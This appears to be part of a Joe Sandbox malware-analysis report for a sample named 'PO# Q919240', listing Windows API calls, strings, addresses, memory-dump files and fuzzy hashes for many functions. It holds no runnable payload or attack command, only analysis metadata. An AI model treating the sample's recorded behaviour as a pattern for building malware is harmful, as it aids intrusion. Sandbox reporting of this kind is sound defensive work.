                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                • String ID:
                • API String ID: 3869813825-0
                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                APIs
                • _wcslen.LIBCMT ref: 00464B28
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                • _wcslen.LIBCMT ref: 00464C28
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                • _wcslen.LIBCMT ref: 00464CBA
                • _wcslen.LIBCMT ref: 00464CD0
                • _wcslen.LIBCMT ref: 00464CEF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$Directory$CurrentSystem
                • String ID: D
                • API String ID: 1914653954-2746444292
                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                APIs
                • _wcsncpy.LIBCMT ref: 0045CE39
                • __wsplitpath.LIBCMT ref: 0045CE78
                • _wcscat.LIBCMT ref: 0045CE8B
                • _wcscat.LIBCMT ref: 0045CE9E
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                • _wcscpy.LIBCMT ref: 0045CF61
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                • String ID: *.*
                • API String ID: 1153243558-438819550
                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll
                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                • API String ID: 3832890014-4202584635
                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                APIs
                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                • GetFocus.USER32 ref: 0046A0DD
                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessagePost$CtrlFocus
                • String ID: 0
                • API String ID: 1534620443-4108050209
                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                APIs
                • DestroyWindow.USER32(?), ref: 004558E3
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$CreateDestroy
                • String ID: ,$tooltips_class32
                • API String ID: 1109047481-3856767331
                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                APIs
                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                • GetMenuItemCount.USER32(?), ref: 00468C45
                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                • GetMenuItemCount.USER32 ref: 00468CFD
                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                • GetCursorPos.USER32(?), ref: 00468D3F
                • SetForegroundWindow.USER32(?), ref: 00468D49
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                • String ID: 0
                • API String ID: 1441871840-4108050209
                • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                • __swprintf.LIBCMT ref: 00460915
                • __swprintf.LIBCMT ref: 0046092D
                • _wprintf.LIBCMT ref: 004609E1
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 3631882475-2268648507
                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                APIs
                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                • SendMessageW.USER32 ref: 00471740
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                • SendMessageW.USER32 ref: 0047184F
                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                • String ID:
                • API String ID: 4116747274-0
                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                APIs
                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                • _wcslen.LIBCMT ref: 00461683
                • __swprintf.LIBCMT ref: 00461721
                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                • GetDlgCtrlID.USER32(?), ref: 00461869
                • GetWindowRect.USER32(?,?), ref: 004618A4
                • GetParent.USER32(?), ref: 004618C3
                • ScreenToClient.USER32(00000000), ref: 004618CA
                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                • String ID: %s%u
                • API String ID: 1899580136-679674701
                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                APIs
                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: InfoItemMenu$Sleep
                • String ID: 0
                • API String ID: 1196289194-4108050209
                • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                APIs
                • GetDC.USER32(00000000), ref: 0043143E
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                • SelectObject.GDI32(00000000,?), ref: 00431466
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                • String ID: (
                • API String ID: 3300687185-3887548279
                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                APIs
                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1976180769-4113822522
                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                • String ID:
                • API String ID: 461458858-0
                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                • CloseHandle.KERNEL32(00000000), ref: 00430113
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                • GlobalFree.KERNEL32(00000000), ref: 00430150
                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
